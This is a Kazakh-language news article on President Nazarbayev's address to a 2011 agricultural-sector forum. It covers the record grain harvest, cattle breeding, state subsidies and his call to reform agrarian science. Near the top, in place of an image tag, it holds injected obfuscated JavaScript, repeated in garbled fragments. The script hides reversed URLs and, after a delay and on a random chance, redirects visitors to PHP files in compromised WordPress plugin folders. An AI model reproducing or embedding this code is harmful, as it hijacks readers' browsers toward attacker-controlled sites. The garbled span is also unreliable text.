Нұрсұлтан НАЗАРБАЕВ: Бізге отандық аграрлық ғылымды дамытатын нақты бағдарлама қажет

Нұрсұлтан НАЗАРБАЕВ: Бізге отандық аграрлық ғылымды дамытатын нақты бағдарлама қажет

Ауыл — қазақтың «алтын бесігі». Ауыл — қазақ рухының темірқазығы.
Ауыл — иісі қазақтың қара шаңырағы. Міне, сондықтан ел басшылығы Тәуелсіздік жылдарында ауылға баса көңіл бөліп, қамқорлықтан қақпай, жанашырлықтан қағажу қалдырмай, қолдап келеді. Азаттықтың ақ таңы атқаннан бергі ауылда атқарылған шаруалардың қорытындысы кеше Астанада, «Қазақстан» Орталық концерт залында, Қазақстан Көшбасшысы Нұрсұлтан Назарбаевтың қатысуымен өткен Агроөнеркәсіптік сектор қызметкерлерінің форумында шығарылды. Ауыл шаруашылығы саласының бұл «құрылтайы» Тәуелсіздігіміздің 20 жылдық мерейтойына арналып отыр.

04154545$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/04154545.jpg» height=»351″ width=»400″ />

Форум жұмысына 2 мыңнан астам делегат қатысты. Қатысушылар арасында Үкімет басшысы, сондай-ақ Парламент палаталарының төрағалары, министрлер мен облыс әкімдері, ауыл шаруашылығы тауарларын өндірушілер, Ауыл шаруашылығы министрлігінің лауазымды басшылары мен комитеттерінің аумақтық инспекцияларының өкілдері, агроөнеркәсіптік кешенге маманданған қоғамдық ұйымдардың жетекшілері, салада ұзақ жылдар еңбек еткен ардагерлер болды.
Форум аясында «Қазақстан» ОКЗ ғимаратының іші-сыртына үлкен көрме жайылды. Сыртта отандық ауыл шаруашылығы машина жасау саласының жетістіктері тізіліп қойылса, іштегі көрмеде ауыл шығаратын өнімдердің неше түрі орын алды. Осы көрмені қызықтаған Елбасы Н.Назарбаевты министрлік басшылығы отандық ауыл шаруашылығының әр алуан салаларындағы серпінді жобаларымен таныстырды. Сондай-ақ Мемлекет басшысына «ҚазАгро» Ұлттық басқарушы холдингінің даму институттарының жетістіктері паш етілді. Осы көрмеге қазақстандық аграрлық сектор ғалымдары ойлап тапқан жаңалықтары да қойылған екен.

АУЫЛ — ЕЛДІҢ АЛТЫН ДІҢГЕГІ, ҚАЛАНЫҢ ТІРЕГІ!
Қыс басталса қала қазағы ауылдан соғымның етін күтеді. Ауылдан қалаға тонналап ұн, жеміс-жидек, көкөніс, сүт және басқасы үздіксіз тасылуда. Ауылдарымыз қаланы асырап отыр. Өз кезегінде орталық та аймақтардағы жобаларды қолдап, ауылдың осы әлеуетін арттыруға үлес қосуда. Форум аясында Президент Нұрсұлтан Назарбаев аймақтармен тікелей байланысқа шығып, «он-лайн» режімде агроөнеркәсіптік кешеннің серпінді жобаларына өмірге жолдама берді. Бұл нысандарда өндірістің озық технологиялары мен инновациялық әдістері қолданылмақ. Мемлекет басшысы Алматы облысының Кербұлақ ауылында бой көтерген көкөніс қоймасын іске қосты. Көкөніс сақтау сыйымдылығы 13 мың тоннаны құрайтын бұл нысан «Елдің оңтүстік өңірлерінде тамшылатып суару технологиясын қолдану арқылы көкөніс-жеміс дақылдарын өсіруді дамыту» жобасы шеңберінде жүзеге асырылып отыр екен. Бұл жоба аймақтағы осы саланың дамуына қарқын қосуға қабілетті. Ірі көкөніс қоймасында енді 119 жаңа жұмыс орны құрылмақшы. Осыдан кейін Елбасының «ақ батасын» алып, Ақмола облысының Азат ауылында асыл тұқымды мал бордақылау кешені өз жұмысын бастады. Бұл «SC Food» асыл тұқымдық репродукторда 2 мың 400 сиыр ұсталмақ, онда сонымен қатар тағы 3 мың ірі қараны бордақылауға арналған алаң бар. Қазіргі кезде кешенге ендігі Ангус тұқымды 446 ірі қара жеткізілгендігі хабарланды. Нысан басшысы Солтүстік Америкада қолданылатын технологиямен жұмыс жасайтындарын жеткізді. Яғни сиырлар мен бұқалар тіпті бұрқыраған боран мен ақырған аязда қораға қамалмай, ашық аспан аясында, еркін жайылым алаңдарында бос, байлаусыз жүреді. Ангус тұқымы мұндай ауа райы жағдайына төзімді көрінеді. Жыл сайын репродуктор басшылығы асыл тұқымды сиырлар мен бұқалардың 1180 басын сатып отырмақ ниетте. Мұның сыртында біраз ірі қара мал сойылып, 772 тонна «мәрмәр ет» нарыққа өткізілмек. Бұл өндірісте 80 жұмыс орны құрылыпты.
Кеше Елбасы іске қосқан кәсіпорындар алда еліміздің сырттан тасылатын импортқа тәуелділігін төмендетуге, сөйтіп, ұлттық азық-түліктік қауіпсіздікті нығайтуға үлес қоспақ, бұл миссиясына олар ендігі қызу кірісті.

ТЫҢ КӨТЕРІЛГЕННЕН БЕРГІ ЕҢ ІРІ РЕКОРД!
Агроөнеркәсіптік сектор қызметкерлерінің форумында сөз сөйлеген Қазақстан Көшбасшысы биыл рекордтық өнім алған қазақстандық астықшыларға алғыс айтты. «Биылғы мерейлі жылда егін бітік шықты, қамбамыз астыққа толды, — деді Нұрсұлтан Назарбаев. — Бұрын болып көрмеген зор табыстарға жеттік. Биылғы астық Қазақстан үшін рекордтық болды. Соңғы 55 жылдағы ең үлкен астық — 30 миллион тоннаға жуық дәнді дақыл жиналып отыр! Оның ішіндегі 20 миллион тоннасы — бидай. Астық шығымдылығының көрсеткіші тың көтерілген алғашқы жылдан бергі барлық рекордтардан асып түсті: әр гектардан 18-ден астам центнер өнім алынды!» деген Елбасы отандық аграршыларды осы ерлігінің жеңісімен, еңбегінің жемісімен құттықтады. Ол ауыл шаруашылығы еңбеккерлерінің ерен табысқа жетіп, ел ырысын еселеп, тәуелсіздік тойына лайықты тарту жасағандығын мәлім етті. «Сіздерді бұрын-соңды болып көрмеген осындай нәтижемен құттықтаймын — деді Президент. — Агроөнеркәсіптік кешен жұмыскерлеріне шын жүректен алғысымды білдіремін! Барлықтарыңыз — аграршылар да, механизаторлар да, астықшылар да жақсы жұмыс жасадыңыздар. Бұл сіздердің Тәуелсіздігіміздің 20 жылдығына арнаған тартуларыңыз, төгілген тердің өтеуі, ерен еңбектің нәтижесі деп білемін». Елбасы Қостанай, Солтүстік Қазақстан, Ақмола облыстарының басшыларына, осы өңірлердің аудандарының барлық әкімдеріне «үлкен рақмет!» айтты.
Айтқандай, Форум соңы астықшылардың қаһарман еңбегін ұлықтаған салтанатты рәсіммен әдіптелгендігін айта кеткен ләзім. Әрине, Тәуелсіздік күні қарсаңында басқа сала үздіктерімен қоса, агроөнеркәсіптік сектордың да ерен еңбегімен көзге түскен көптеген өкілдері ұлықталары анық. Ал одан бұрын, кеше Қазақстан Көшбасшысының «Қазақстан Республикасының мемлекеттік наградаларымен наградтау туралы» арнайы Жарлық шығарғандығы жария болды. 11 қарашада қол қойылған Президенттің №173 Жарлығына сәйкес, «Қазақстан Республикасын экономикалық дамытудағы, өндірістік қызметтегі аса үздік жетістіктері үшін» үш адамға «Қазақстанның Еңбек Ері» атағы тағайындалды. Осы орайда кеше Нұрсұлтан Назарбаев Қостанай облысының Қостанай ауданының «Заречное» серіктестігінің директоры Валентин Двуреченскийге, Ақмола облысының Зеренді ауданының «Қазэкспортастық Агрофирмасы» серіктестігінің Бас директоры Әділхан Кенжебаевқа және Солтүстік Қазақстан облысының Тайынша ауданының «Тайынша-Астық» серіктестігінің Бас директоры Руслан Молдабековке «Еңбек Ері» атағына ие болғандардың айрықша ерекшелік белгісін — Алтын жұлдыз бен «Отан» орденін салтанатты түрде табыс етті.

АЗАТ ЕЛДІҢ АДЫМЫ АРШЫН!
Президент Н.Назарбаев биылғы қазақстандық астық рекордына екі шешуші фактордың — фермерлердің ерлікке бара-бар еңбегінің және солар сүйенген кең ауқымды мемлекеттік қолдаудың арқасында қол жеткізілгендігін мәлімдеді. «Тек соңғы 5 жыл ішінде республикалық бюджеттен аграрлық секторды дамытуға 670 миллиард теңге бөлінді, — деп атап көрсетті Мемлекет басшысы, — 2009 жылы жаһандық дағдарыс күшейіп тұрған тұста, Ұлттық қордан ауылға 120 миллиард теңге бөлініп, бұл қаржылар, негізінен, өңдеуші саладағы инвестициялық жобаларды жүзеге асыруға арна тартты». Елбасы осы миллиардтар тасқыны есебінен 42 жаңа жоба іске қосылып, мыңдаған ауыл тұрғындары жұмыспен қамтылғандығынан құлағдар етті. Бұл қаражат ендігі қайтарымын беріп, Қазақстанның ауылшаруашылық өнім өндірісінің ауқымы артқан.
Жаһандық күйзеліс қысқан шақта ауылға мол демеу қаржы бағыттаған мемлекет «Жол картасы» сынды жаңа бағдарламалар аясында жол салып, уақытша жұмыс орындарын ашып, мектептер мен ауруханалардың құрылысын қарқынды жүргізді. «Бұл көптеген кәсіпорындарымыз тоқыраған дағдарыс кезеңіндегі мемлекет тарапынан көрсетілген ауқымды қамқорлық болатын, — деді Нұрсұлтан Назарбаев. — Сол дағдарыс орын алған 2009 жылы ауыл шаруашылығы саласының өсімі 9 пайызды құрады».
Президенттің дерегінше, қазір Қазақстанда 185 мың шаруа қожалығы еңбек етіп жатыр. Бұған қоса, республикадағы осы сала серіктестік және акционерлік қоғам ретінде тіркелген 9 мың ірі және орта кәсіпорын жұмыс жасауда. Елбасы оларда еңбекпен қамтылған халықтың шамамен үштен бірі жұмыс істейтіндігіне назар аудартты. «Бұл сектор жыл сайын еліміздің ұлттық байлығының жеті пайыздайын береді» деп, мәлім етті Нұрсұлтан Назарбаев.
Ауылдың көркі шаруашылығының өркендеуімен әдемі өрілуде. Кеңес кезіндегідей, кез келген жолмен миллиард пұттық жоспарды орындауға тырмысып, мал басынан асыра төл алудан жарысқа түсіп, «миллиардер ауыл» атақтарына таласып жатпай-ақ, қазір аймақтарда ауыл шаруашылығы қарқынды даму үстінде. Бұл өмір шындығының бір ұштығын ресми деректерден де байқаймыз. Статистика жөніндегі агенттіктің дерегінше, биылғы он айдағы өсім қарқыны бойынша ауыл шаруашылығы ел экономикасының барлық салалары арасында, алдына қара салмай, алдыңғы орынға шығыпты: ауыл шаруашылығының 2011 жылдың қаңтар-қазанындағы өсімі, былтырғы жылдың сәйкес кезеңімен салыстырғанда,122,8%-ға жетіп отыр! Астық экспортынан әлемдік ондықтамыз. Жан басына шаққандағы ұн өндіру көлемі жөнінен Қазақстан бірнеше жыл қатарынан дүниежүзіндегі көшбасшылық орнын сақтап тұр. Ағымдағы жылдың қаңтар-қазан аралығында елімізде ендігі 2,9 миллион тонна ұн тартылған екен.

ӨЗІМІЗДІҢ АСЫЛ ТҰҚЫМ ҚАЙДА?
Биылдан бастап, ата-баба кәсібі — мал шаруашылығына күрт бетбұрыс жасалып отыр. Елбасы биыл ет экспортын 60 мың тоннаға жеткізу жөнінде Үкімет алдына міндет қойды. Бұл ретте мемлекет малдың етті тұқымдарын өсіруге басымдық беруде. Осы орайда қазіргі кезде елімізде сырттан асыл тұқымды мал сатып алу ісінің керемет қарқын алғандығын аңғаруға болады. Тек «ҚазАгроҚаржы» құрылымы арқылы ғана биыл 7 мыңнан астам осындай ірі қара мал сатып әкелінетін көрінеді! Бұл ретте өз еліміздегі асыл тұқымды мал алу ісі тасада қалмауы керек. Қазақ елінің бұл тарапта мақтанар дүниесі жетерлік, мысал ретінде «қазақтың ақ бас сиырын», Еділбай тұқымды қойын және басқаларын келтіруге болады.
Форум кезінде сөз сөйлеген «Кроун-Батыс» компаниясының басшысы Берік Қабитханұлының Батыс Қазақстан облысындағы мал бордақылау кешені туралы баяндамасын тыңдап болған соң, Елбасы өз ойын білдірді.
— Батыс Қазақстан облысы ежелден етті мал өсіретін өңір болып еді, — деді Н.Назарбаев. — Герефорд сиыры, басқа да асыл тұқымды мал бұрындары да әкелінетін. Алайда кейін солардың барлығы жергілікті малдармен араласып кетті де, асыл қасиеттерін жоғалтып алды. Енді соны қалпына келтіру үшін мемлекеттен қыруар ақша шығарып отырмыз.
Бұл мүмкіндікті ауыл шаруашылығы өндірушілері пайдаланып қалуға ұмтылуы қажет. Бірақ олар мұны есепсіз қаржы екен деп те ойламаулары керек. Әр тиын санаулы болады. «Бұл — халық қаржысы, ол кредиттер кері қайтарылуы қажет! — деп нықтады Мемлекет басшысы. — Екіншіден, біз қазір асыл тұқымды малды сырттан әкеліп жатырмыз. Әрине, бұл ұзаққа созылмайды. Дегенмен қазір қымбат бағамен мал әкелуден басқа амал жоқ. Егер оларды әкелмесек, экспортқа ет шығаруды 10-20 жылға шегеретін едік. Дегенмен шетелдік асыл тұқымды малды сатып алумен қоса, сондай отандық малды да өсіру қажет. Әйтпесе асыл тұқымды малды үнемі жатжұрттардан сатып алып отыруға тура келеді» деген Елбасы Үкімет пен сала басшыларына «Қазақстанда асыл тұқым алу жұмыстарын жүргізуді», отандық ғалымдарымыздың жаңалықтарын пайдалануды жүктеді.
Қалай болғанда, Қазақстан үлес-салмағы 82 пайызды құрайтын тексіз, аз өнім беретін малдардың үлесін азайту бағытында қимылдай бермек. Ел басшылығы осындай міндет қойғандықтан, тіпті жатжұрттық асыл тұқымды, қымбат малды алуға ақшасы жоқ ауыл іскерлерінің өздері де елде бар қарапайым сиырларды асылдандыруға талпынып жатқандығы мәлім болды. «Биылғы жылы фермерлік шаруашылықтар ендігі 45 мың нашар тұқымды сиыр сатып алды, — деді Ауыл шаруашылығы министрі Асылжан Мамытбеков. — Олардан келесі жылы, асыл тұқымды бұқаларды пайдалану есебінен, салмағы жөнінен анағұрлым өнімді төл алынатын болады».

АУЫЛ ШАРУАШЫЛЫҒЫ — СТРАТЕГИЯЛЫҚ САЛА
Азаттық жылдарында елді аман сақтауға атсалысқан ауыл шаруашылығы, Президенттің пікірінше, тәуелсіздіктің алдағы жылдарында да ел экономикасын алға сүйрейтін жетекші саланың бірі болып қала береді.
— Халқымызда «Ауыл — ат байлар алтын қазық» деген қанатты сөз бар, — деді Қазақстан Көшбасшысы. — Расында, ауыл біздің қастерлі ата қонысымыз, тіршілік-тынысымыз, киелі алтын тамырымыз. Баршаңыз білесіздер, біз индустриялық-аграрлық елміз. Біздің ел экономикасының екі басым бағыты бар. Бұл — индустрия және аграрлық сала. Ауыл шаруашылығы қашанда ел экономикасын алға сүйрейтін жетекші саланың бірі болған, солай қала береді де. Мен оған кәміл сенемін!
Нұрсұлтан Назарбаев ауыл шаруашылығын дамыту — «7 000-ға жуық ауылды өркендетіп», «ел азаматтарының тең жартысының жағдайын жасау» дегенді білдіретіндігін айтты. «Сондықтан біз бұл салаға айрықша назар аударып, тәуелсіздік жылдарында ерекше көңіл бөліп, көп қаражат жұмсап келе жатқанымызды білесіздер! — деді Президент, — Кеңестер Одағынан бізге ауыртпалығы мол, артта қалған ауыл шаруашылығы мұра болып қалды. Азаттықтың алғашқы жылдарында да ауыл алапат дағдарыстарды бастан өткерді. Малдың басы азайды, жерді игеру тоқтап қалды. Дегенмен сол қиындықтарды жеңіп, ауқымды жаңғыртулар арқылы біз ауыл шаруашылығын қарыштатып, дамыта алдық».
Мемлекет басшысының айтуынша, Қазақстан «жасампаз жиырма жылда ауылдың еңсесін тіктеп, агроөнеркәсіпті өрге сүйреді». «Біздің дұрыс жол таңдағанымызды уақыттың өзі дәлелдеп отыр» деп, түйді Елбасы.
Ендігі уақытта ел алдында ауыл шаруашылығы саласын инновациялық жолға қою міндеті тұр. Осы орайда Президент Нұрсұлтан Назарбаев Ауыл шаруашылығы министрлігіне «ҚазАгроИнновация» компаниясымен бірлесіп, отандық аграрлық ғылымды реформалау туралы тапсырма берді.
— Ауыл шаруашылығы инновациялы болуға тиіс, — деп шарт түйді Мемлекет басшысы. — Бізге отандық аграрлық ғылымды дамытатын нақты бағдарлама қажет. Он жылда мемлекет ауыл шаруашылығы саласындағы тәжірибелерді дамытуға 20 млрд теңгеден астам шығын шығарған. Біздің ғалымдарымыз, мәселен, бидайдың жоғары өнімді тұқымын бөліп шығарды. Алайда бұларды түбегейлі қолдану әлі де көрініс таппай отыр. Не себепті? Ғалымдар ондаған жылдарын сарп етіп, жаңа сұрыптар, агротехнологиялар ойлап табады. Сосын мемлекеттік комиссия ол жаңалықты «ендіру керек пе, жоқ па» деп, үш жыл бойы қарайды екен. Ал сол уақытта ғылым бір орнында тұра ма? Нәтижесінде, біздің ғалымдарымыздың еңбегі еш болып, ешкімге керексіз қалып жатыр.
Осы себепті енді Үкімет отандық ғылымды ынталандыруға, оның үздік өнертабыстарын өндіріске ендіруге, сол арқылы ғалымдарымыздың табыс табуына көңіл бөлуі керек деді Президент. «Міне, сонда ғана біздің ісіміз өнімді болады! Сондықтан Ауыл шаруашылығы министрлігі қайдан сатып алу мәселелеріне емес, біздің ғалымдарымыздың жаңалықтары қалай тәжірибеге еніп жатқанына баса назар аударса игі. Біз өзіміздің ғылымды тиісті деңгейде дамытпасақ болмайды. Біздің ғалымдарымызға қолдау керек» деді ол. Қазақстан Көшбасшысы бұған дейін қуатты ғылыми базаны Шортандыда құру туралы тапсырма берген, кеше дәл сондай базаның енді оңтүстікте де бой көтеруге тиістігін белгіледі. Елбасы Ауыл шаруашылығы министрлігіне «ҚазАгроИнновация» құрылымымен тізе қосып, отандық аграрлық ғылымды реформалауды жүктеді.
Ал аймақ әкімдері ұсақ шаруашылықтарды ірілендіруге ден қоюға міндеттелді. «Шетелдік озық технология әзірше ірі, орта шаруашылықтар үшін ғана қолжетімді, — деді Нұрсұлтан Назарбаев. — Бұл анық. Ал саладағы қаптаған ұсақ фермерлердің оны қолдануға мүмкіншілігі жоқ. Бізде мыңдаған шағын шаруашылық бар. Сондықтан барлық облыс әкімдері Ауыл шаруашылығы министрлігімен бірге, осы ұсақ шаруашылықтарды ірілендіруге жұмылуы керек» деп, нықтады Елбасы.
Кеше сондай-ақ Президент Үкіметке аграрлық сектордағы мемлекеттік қолдаудың жаңа механизмдеріне өтуге арналған «Жол картасын» әзірлеуді тапсырды. Онда мал шаруашылығы мен өңдеуші өнеркәсіпті дамытуға баса назар аударылатын болады.

www.kyzmet-gazeti.kz {jcomments on}

http://www.aikyn.kz/index.php?option=com_content&task=view&id=10907&Itemid=2

Leave a Reply

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Яндекс.Метрика